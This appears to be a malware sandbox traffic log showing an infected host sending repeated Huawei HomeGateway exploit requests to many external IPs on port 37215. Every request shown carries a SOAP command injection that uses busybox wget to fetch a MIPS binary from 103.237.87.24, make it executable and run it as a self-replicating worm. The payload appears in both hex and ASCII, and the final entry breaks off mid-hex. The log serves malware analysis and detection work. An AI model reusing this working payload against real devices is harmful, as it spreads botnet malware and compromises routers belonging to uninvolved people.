                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1799192.168.2.1333050211.77.121.24737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.542465925 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1800192.168.2.134302241.220.166.12237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.543590069 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1801192.168.2.1358968197.25.228.137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.543667078 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1802192.168.2.134401241.126.89.1637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.543669939 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1803192.168.2.135521613.131.58.22137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.543709993 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1804192.168.2.134214841.4.232.23937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.543751001 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1805192.168.2.1351666157.249.251.15637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.543751001 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1806192.168.2.133467241.225.54.22437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.543812990 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1807192.168.2.1357328197.192.143.14437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.543864012 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1808192.168.2.134807847.116.176.14137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.543864012 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 